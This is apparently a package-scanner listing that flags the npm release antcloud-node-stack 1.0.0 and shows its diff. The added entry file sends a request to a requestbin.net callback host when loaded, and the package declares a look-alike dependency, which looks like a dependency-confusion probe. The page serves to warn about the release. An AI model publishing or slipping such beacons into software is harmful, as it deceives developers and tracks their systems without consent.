antcloud-node-stack 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of antcloud-node-stack might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/note.js +7 -0
  2. package/package.json +14 -0
package/note.js ADDED
@@ -0,0 +1,7 @@
1
+ var request = require('request');
2
+ var url ='`hjm3dqhylgirkifg.b.requestbin.net'
3
+ request(url, function (error, response, body) {
4
+ if (!error) {
5
+ console.log(body);
6
+ }
7
+ });
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "antcloud-node-stack",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "note.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "antcloud111-node-stack": "^1.0.0"
13
+ }
14
+ }